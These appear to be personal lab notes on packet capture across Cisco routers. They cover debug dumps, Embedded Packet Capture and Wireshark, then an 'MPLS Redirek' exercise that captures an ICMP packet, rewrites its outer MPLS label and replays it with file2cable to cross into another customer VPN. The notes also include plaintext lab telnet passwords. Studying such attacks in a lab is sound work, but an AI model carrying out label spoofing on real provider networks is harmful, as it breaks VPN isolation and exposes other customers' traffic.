1. Sniffing
- Pesaro (debug ip packet detailed dump)
Pescara:
sh access-lists 111
Pesaro:
ping vrf Customer_C 222.0.5.1

Pescara should show dump result >> dump2pcap
Read with wireshark

- Pauillac (EPC)
Pauillac:
sh access-list 111
monitor capture buffer TEST_BF size 256
monitor capture buffer TEST_BF filter access-list 111
monitor capture point ip cef TEST_CP all both
monitor capture point associate TEST_CP TEST_BF
monitor capture point start TEST_CP

Pescara:
telnet 10.1.1.22
pass: test123

Pauillac:
monitor capture point stop TEST_CP
show monitor capture buffer TEST_BF dump >> dump2pcap
OR
monitor capture buffer TEST_BF export tftp://192.168.137.103/out.pcap
Read with wireshark

- Wireshark (Pescara - Pauillac)
Linux box:
route del default gw 192.168.137.1
route add default gw 222.0.5.1
Pescara:
ping vrf Customer_C 222.0.5.10
Read wireshark, see the MPLS label?

Linux box:
telnet 223.0.5.1
pass: 12345678

2. MPLS Redirek

Requirement:
1. Access to backbone MITM
2. Tools
3. Knowledge about destination Label
4. Duplicate routing entry

is that combination possible? :))) ernw.de suck

- Linux box:
tshark -nxi tap2 -f "icmp[icmptype] = icmp-echo"
tshark -nxi br1 -f mpls
- Pescara:
ping vrf Customer_C 222.0.5.10 >> see tshark on br1 & tap2
ping vrf Customer_A 222.0.5.10 >> see tshark on br1 & tap2
sh bgp vpnv4 unicast all labels

- Linux box:
vim /tmp/packet >> based on 1 x icmp request on br1
text2pcap /tmp/packet /tmp/packet.pcap >> see outter label with wireshark
vim /tmp/packet >> change outter label with the destination label
text2pcap /tmp/packet /tmp/packet2.pcap >> see outter label with wireshark
xxd -r /tmp/packet /tmp/packet.bin

see tshark on tap2
file2cable -v -i br1 -f /tmp/packet.bin
see tshark on tap2